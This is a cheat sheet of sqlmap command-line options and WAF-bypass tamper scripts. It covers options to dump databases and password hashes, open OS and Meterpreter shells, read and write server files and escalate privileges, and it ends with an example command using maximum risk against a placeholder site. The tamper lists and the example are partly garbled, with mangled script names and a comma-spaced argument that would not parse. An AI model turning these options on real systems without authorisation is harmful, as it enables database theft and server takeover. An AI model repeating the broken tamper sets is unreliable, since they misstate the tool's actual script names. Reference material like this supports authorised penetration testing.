
SqlMap commands




Aug 3, 2019
-d DIRECT  Direct database connection
-u URL, --url=URL  Target URL (for example, "www.target.com/vuln.php?id=1")
-l LOGFILE  Parse targets from a Burp or WebScarab proxy log file
-m BULKFILE  Scan the list of targets given in the supplied file
-r REQUESTFILE  Load HTTP request from a file
-g GOOGLEDORK  Use Google dork results as target URLs (site:, inurl:, intext:)
-c CONFIGFILE  Load settings from a configuration INI file

--data=DATA  Data string to be sent in a POST request
--param-del=PDEL  Character used to separate parameter values
--cookie=COOKIE  HTTP Cookie header
--cookie-del=CDEL  Character used to separate cookie values
--load-cookies=A..  File containing cookies in Netscape/wget format
--drop-set-cookie  Ignore the Set-Cookie header in the response
--user-agent=AGENT  HTTP User-Agent header
--random-agent  Use a random HTTP User-Agent header
--host=HOST  HTTP Host header
--referer=REFERER  HTTP Referer header
--headers=HEADERS  Extra headers (e.g. "Accept-Language: fr\nETag: 123")
--auth-type=ATYPE  HTTP authentication type (Basic, Digest or NTLM)
--auth-cred=ACRED  HTTP authentication credentials (name:password)
--auth-private=A..  Private PEM key file for HTTP authentication
--proxy=PROXY  HTTP proxy used to connect to the target URL
--proxy-cred=PCRED  HTTP proxy authentication credentials (name:password)
--ignore-proxy  Ignore system proxy settings
--tor  Use Tor to connect
--tor-port=TORPORT  Specify a Tor proxy port other than the default
--tor-type=TORTYPE  Specify the Tor proxy type (HTTP (default), SOCKS4 or SOCKS5)
--check-tor  Check whether Tor is being used properly
--delay=DELAY  Delay in seconds between each HTTP request
--timeout=TIMEOUT  Seconds to wait before timing out the connection (default 30)
--retries=RETRIES  Number of retries after a timeout (default 3)
--randomize=RPARAM  Use a random value for the given parameters
--safe-url=SAFURL  URL to visit frequently during testing
--safe-freq=SAFREQ  Number of test requests between two visits to the given safe URL
--skip-urlencode  Skip URL encoding of payload data
--force-ssl  Force use of SSL/HTTPS
--hpp  Use HTTP parameter pollution (HPP)
--eval=EVALCODE  Execute Python code before the request (e.g. "import hashlib;id2=hashlib.md5(id).hexdigest()")

-o  Enable all optimization switches
--predict-output  Predict common query output
--keep-alive  Use persistent HTTP(S) connections
--null-connection  Get the page size without the HTTP response body
--threads=THREADS  Maximum number of concurrent HTTP(S) requests (default 1)

-p TESTPARAMETER  Parameter(s) to test
--skip=SKIP  Skip testing of the given parameters
--dbms=DBMS  Force use of the given back-end DBMS
--dbms-cred=DBMS..  DBMS authentication credentials (user:password)
--os=OS  Force the back-end DBMS server operating system to the given value
--invalid-bignum  Use large numbers to invalidate values
--invalid-logical  Use logical operations to invalidate values
--invalid-string  Use random strings to invalidate values
--no-cast  Disable payload casting
--no-escape  Disable string escaping
--prefix=PREFIX  Payload prefix string
--suffix=SUFFIX  Payload suffix string
--tamper=TAMPER  Use the given script to tamper with injection data

--level=LEVEL  Test level (1-5, default 1)
--risk=RISK  Test risk (0-3, default 1)
--string=STRING  String to match when the request returns TRUE
--not-string=NOT..  String to match when the request returns FALSE
--regexp=REGEXP  Regular expression to match when the request returns TRUE
--code=CODE  HTTP code to match when the request returns TRUE
--text-only  Compare pages based on their text content
--titles  Compare pages based on their titles

--technique=TECH  SQL injection techniques to use (default "BEUSTQ")
--time-sec=TIMESEC  Seconds to delay the DBMS response (default 5)
--union-cols=UCOLS  Range of columns to test for UNION query SQL injection
--union-char=UCHAR  Character to use when brute-forcing the number of columns
--union-from=UFROM  Table to use in the FROM part of a UNION query
--dns-domain=DNS..  Domain name used for the DNS exfiltration attack
--second-order=S..  URL of the resulting page searched for the second-order response

-f, --fingerprint  Retrieve extended DBMS version information by fingerprint
-a, --all  Retrieve everything
-b, --banner  Retrieve the DBMS banner (official name, version number)
--current-user  Retrieve the current DBMS user
--current-db  Retrieve the current database
--hostname  Retrieve the host name of the DBMS server
--is-dba  Determine whether the current user is an admin
--users  List DBMS users
--passwords  List the password hashes of DBMS users
--privileges  List privileges
--roles  List user roles
--dbs  List databases in the DBMS
--tables  List the tables of the current database
--columns  List the columns of the current database
--schema  List the DBMS schema
--count  Get the number of entries in the tables
--dump  Dump the entries of the current database table
--dump-all  Dump all tables from all databases in the DBMS
--search  Search for columns, tables and/or database names
--comments  Retrieve DBMS comments
-D DB  DBMS database to list
-T TBL  DBMS table to list
-C COL  DBMS table column to list
-X EXCLUDECOL  DBMS table column(s) to exclude from listing
-U USER  DBMS user to list
--exclude-sysdbs  Exclude DBMS system databases when enumerating tables
--where=DUMPWHERE  Use a WHERE condition when dumping the table
--start=LIMITSTART  First query output entry to retrieve
--stop=LIMITSTOP  Last query output entry to retrieve
--first=FIRSTCHAR  First query output word character to retrieve
--last=LASTCHAR  Last query output word character to retrieve
--sql-query=QUERY  SQL statement to execute
--sql-shell  Open an interactive SQL shell
--sql-file=SQLFILE  Execute SQL statements from the given file(s)

--common-tables  Check for the existence of common tables
--common-columns  Check for the existence of common columns

User Defined Functions
--udf-inject  Inject user-defined functions
--shared-lib=SHLIB  Local path to the shared library

File system access
--file-read=RFILE  Read a file from the DBMS server file system
--file-write=WFILE  Write a file to the DBMS server file system
--file-dest=DFILE  Absolute path on the DBMS server to write the file to

Operating system access
--os-cmd=OSCMD  Run a command in the OS shell
--os-shell  Open an interactive OS shell
--os-pwn  Open an out-of-band shell, Meterpreter or VNC session
--os-smbrelay  One-click prompt for an out-of-band shell, Meterpreter or VNC session
--os-bof  Buffer overflow exploitation
--priv-esc  Privilege escalation of the database process user
--msf-path=MSFPATH  Local path of the Metasploit Framework installation
--tmp-path=TMPPATH  Absolute path of the temporary files directory

Access to the Windows registry
--reg-read  Read a registry key value
--reg-add  Write a registry key value
--reg-del  Delete a registry key value
--reg-key=REGKEY  Registry key
--reg-value=REGVAL  Registry key value
--reg-data=REGDATA  Registry key value data
--reg-type=REGTYPE  Registry key value type

-s SESSIONFILE  Load a saved session from file (.sqlite)
-t TRAFFICFILE  Write all HTTP traffic to a file
--batch  Never prompt for user input; use the default action
--charset=CHARSET  Set the character encoding for retrieved data
--crawl=CRAWLDEPTH  Crawl the website starting from the given URL
--csv-del=CSVDEL  Delimiter character used in CSV output (default ",")
--dump-format=DU..  Data dump format (CSV (default), HTML or SQLITE)
--eta  Show the estimated time for each output
--flush-session  Flush session files for the current target
--forms  Parse and test forms at the given URL
--fresh-queries  Ignore query results stored in the session file
--hex  Use DBMS hex functions for data retrieval
--output-dir=ODIR  Custom output directory path
--parse-errors  Parse and display errors
--pivot-column=P..  Name of the pivot (key) column
--save  Save settings to a configuration INI file
--scope=SCOPE  Regular expression for filtering targets from the provided proxy log
--test-filter=TE..  Select tests by payload or title (for example, ROW)
--update  Update sqlmap

-z MNEMONICS  Use short mnemonics (such as "flu,bat,ban,tec=EU")
--alert=ALERT  Run console command(s) when an SQL injection is found
--answers=ANSWERS  Set answers to questions (for example, "quit=N,follow=N")
--beep  Beep when a vulnerability is found
--check-waf  Heuristically check for WAF/IPS/IDS protection
--cleanup  Clean up sqlmap-specific UDFs and tables from the DBMS
--dependencies  Check for missing sqlmap dependencies
--disable-coloring  Disable console output coloring
--gpage=GOOGLEPAGE  Google results page number from which to start using dork results
--identify-waf  Test for WAF/IPS/IDS protection
--mobile  Imitate a smartphone through the HTTP User-Agent header
--page-rank  Display page rank for Google dork results
--purge-output  Safely remove all content from the output directory
--smart  Perform testing only if the heuristic analysis is positive
--wizard  Simple wizard interface for beginner users, prompting for every action

-h, --help  Print short help for the program
-hh  Print full help for the program
--version  Print the program version
-v VERBOSE  Verbosity level: 0-6 (default 1)

apostrophemask.py  Replaces the single quote character with its UTF-8 full-width counterpart
apostrophenullencode.py  Replaces the single quote character with its double-byte Unicode counterpart
appendnullbyte.py  Appends an encoded NULL byte character to the end of the payload
base64encode.py  Base64-encodes the payload
between.py  Replaces the greater-than sign ">" with "NOT BETWEEN 0 AND #" and the equals sign "=" with "BETWEEN # AND #"
bluecoat.py  Replaces the space after an SQL statement with a valid random blank character, then replaces the equals sign "=" with LIKE
chardoubleencode.py  Double URL-encodes all characters in the payload (does not process already-encoded characters)
charencode.py  URL-encodes all characters in the payload (does not process already-encoded characters)
charunicodeencode.py  Unicode-URL-encodes the non-encoded characters in the payload (does not process already-encoded characters)
concat2concatws.py  Replaces "CONCAT(A, B)" with "CONCAT_WS(MID(CHAR(0), 0, 0), A, B)"
equaltolike.py  Replaces the equals sign "=" with the LIKE operator
greatest.py  Uses the "GREATEST" function instead of ">"
halfversionedmorekeywords.py  Adds a versioned MySQL comment before each keyword
ifnull2ifisnull.py  Replaces "IFNULL(A, B)" with "IF(ISNULL(A), B, A)"
lowercase.py  Replaces each keyword character with its lowercase value
modsecurityversioned.py  Encloses the complete query in a versioned comment
modsecurityzeroversioned.py  Encloses the complete query in a zero-versioned comment
multiplespaces.py  Adds multiple spaces around SQL keywords
nonrecursivereplacement.py  Replaces predefined SQL keywords with representations suited to non-recursive replacement filters
overlongutf8.py  Converts all characters in the payload to overlong UTF-8
percentage.py  Adds a percent sign "%" in front of each character
randomcase.py  Replaces each keyword character with a random-case value
randomcomments.py  Inserts random comments into SQL keywords
securesphere.py  Appends a specially crafted string
sp_password.py  Appends 'sp_password' to the end of the payload to obfuscate it in DBMS logs
space2comment.py  Replaces spaces with the comment "/**/"
space2dash.py  Replaces spaces with a dash comment "--" followed by a random string and a line feed
space2hash.py  Replaces spaces with a hash comment "#" followed by a random string and a line feed
space2morehash.py  Same as space2hash.py
space2mssqlblank.py  Replaces spaces with a random blank character from a valid set of alternate characters
space2mssqlhash.py  Replaces spaces with a hash comment "#" followed by a line feed
space2mysqlblank.py  Replaces spaces with a random blank character from a valid set of alternate characters
space2mysqldash.py  Replaces spaces with a dash comment "--" followed by a line feed
space2plus.py  Replaces spaces with a plus sign "+"
space2randomblank.py  Replaces spaces with a random blank character from a valid set of alternate characters
unionalltounion.py  Replaces UNION ALL SELECT with UNION SELECT
unmagicquotes.py  Replaces the quote character with the multi-byte combination %bf%27 and adds a generic comment at the end
varnish.py  Adds the "X-originating-IP" HTTP header to bypass WAF
versionedkeywords.py  Encloses each non-function keyword in a versioned MySQL comment
versionedmorekeywords.py  Encloses each keyword in a versioned MySQL comment

Universal set suitable for all databases:
 tamper = apostrophemask, apostrophenullencode, base64encode, between, chardoubleencode, charencode, charunicodeencode, equaltolike, greatest, ifnull2ifisnull, multiplespaces, nonrecursivereplacement, percentage, randomcase, securesphere, space2comment, space2plusquot unitm2, unit2, unit2 space

tamper = between, charencode, charunicodeencode, equaltolike, greatest, multiplespaces, nonrecursivereplacement, percentage, randomcase, securesphere, sp_password, space2comment, space2dash, space2mssqlblank, space2mysqldash, space2plus, space2randomblank, unionmt

tamper = between, bluecoat, charencode, charunicodeencode, concat2concatws, equaltolike, greatest, halfversionedmorekeywords, ifnull2ifisnull, modsecurityversioned, modsecurityzeroversioned, multiplespaces, nonrecursivereplacement, percentage2 space2ash2 space space com , unmagicquotes, versionedkeywords, versionedmorekeywords, xforwardedfor

Example sqlmap usage
sqlmap -u 'http://www.site.com:80/search.cmd?form_state=1' --level=5 --risk=3 -p 'item1' --tamper=apostrophemask, apostrophenullencode, appendnullbyte, base64encode , between, bluecoat, chardoubleencode, charencode, charunicodeencode, concat2concatws, equaltolike, greatest, halfversionedmorekeywords, ifnull2ifisnull, modsecurityversioned, modsecurityzeroversioned, multiplespaces, nonrecursivereplacementl, space2m, space2m, space2m, space2m, spacem , space2mysqldash, space2plus, space2randomblank, sp_password, unionalltounion, unmagicquotes, versionedkeywords, versionedmorekeywords
